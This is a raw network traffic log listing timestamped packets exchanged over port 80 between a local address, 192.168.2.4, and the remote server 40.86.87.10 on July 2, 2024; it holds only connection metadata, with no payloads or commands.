Jul 2, 2024 07:31:09.865865946 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.865886927 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.866030931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.866043091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.866053104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.866064072 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.866075039 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.866091013 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.866117954 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.866183996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.866195917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.866206884 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.866219044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.866225004 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.866230965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.866254091 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.866281986 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.866975069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.866986036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.866997004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867008924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867019892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867031097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867032051 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.867043018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867053986 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.867054939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867067099 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867068052 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.867078066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867099047 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.867125034 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.867701054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867711067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867722034 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867733002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867743015 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867748976 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.867754936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867765903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867770910 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.867777109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867780924 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.867789030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867799997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867810965 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.867811918 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867824078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867835999 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.867840052 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.867858887 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.867876053 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.868158102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.868170023 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.868180037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.868191004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.868201971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.868202925 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.868212938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.868213892 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.868225098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.868237019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.868242979 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.868252993 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.868263006 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.868264914 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.868278027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.868279934 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.868288994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.868302107 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.868303061 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.868339062 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.868359089 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.873593092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.873658895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.873672009 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.873773098 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.873805046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.873816013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.873827934 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.873836994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.873847961 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.873850107 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.873888016 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.873914957 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.874025106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874036074 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874047041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874057055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874068022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874075890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.874079943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874090910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874102116 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874104977 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.874113083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874120951 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.874125004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874150038 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.874174118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.874489069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874500990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874533892 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.874560118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.874636889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874649048 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874659061 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874670029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874681950 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874691010 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.874692917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.874721050 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.874732971 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.909750938 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.914714098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.298284054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.298310041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.298321962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.298341036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.298352003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.298362970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.298376083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.298387051 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.298430920 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.298441887 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.298630953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.298643112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.298655987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.298666000 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.298674107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.298686981 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.298710108 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.420568943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.420584917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.420597076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.420614958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.420625925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.420644999 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.420672894 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.420746088 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.420833111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.420874119 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.420902967 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.420914888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.420944929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.420993090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421005964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421020031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421032906 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.421036959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421047926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421065092 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.421092033 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.421160936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421174049 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421211958 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.421356916 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421400070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421411991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421449900 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.421494961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421580076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421590090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421601057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421613932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421624899 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.421639919 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.421667099 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.421765089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421777010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.421817064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.551151991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551191092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551203966 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551240921 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.551270008 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.551285982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551297903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551309109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551321030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551328897 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.551347017 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.551373959 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.551584959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551597118 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551609039 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551620960 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551631927 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551640987 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.551672935 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.551851034 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551870108 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551882029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551892996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551898956 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.551904917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551917076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551928043 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551928043 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.551939964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551949978 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551954985 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.551960945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.551974058 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.551985025 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.552012920 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.552303076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.552314997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.552325010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.552354097 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.552367926 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.552453041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.552464008 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.552474022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.552493095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.552505016 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.552515030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.552520990 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.552520990 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.552525997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.552539110 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.552548885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.552555084 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.552560091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.552571058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.552582026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.552588940 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.552594900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.552607059 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.552635908 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.552635908 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.553313971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.553325891 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.553337097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.553348064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.553359032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.553365946 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.553369999 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.553380966 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.553391933 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.553391933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.553402901 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.553407907 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.553431988 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.553452015 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.665594101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.665621042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.665632010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.665704966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.665750980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.665762901 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.665775061 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.665786028 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.665816069 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.665842056 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.665944099 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.665956974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666004896 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.666094065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666105032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666115999 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666127920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666135073 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.666141033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666147947 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.666153908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666166067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666182041 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.666208982 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.666498899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666511059 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666522980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666534901 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666538954 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.666563988 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.666590929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.666766882 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666779041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666790009 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666800976 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666807890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.666814089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666825056 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666827917 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.666836977 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666847944 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666853905 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.666862011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666865110 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.666877985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.666898012 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.666932106 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.667167902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667179108 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667190075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667217016 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.667238951 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.667238951 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.667310953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667323112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667359114 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.667469025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667480946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667490959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667503119 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667507887 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.667509079 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667521954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667534113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667534113 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.667545080 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667556047 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667567015 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667576075 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.667579889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667591095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667601109 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.667601109 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.667609930 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667619944 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.667620897 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.667644978 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.667656898 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.668275118 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668286085 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668296099 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668309927 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668320894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668328047 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.668330908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668344021 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:10.668354034 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:10.668354988 CEST	80	49730	40.86.87.10	192.168.2.4
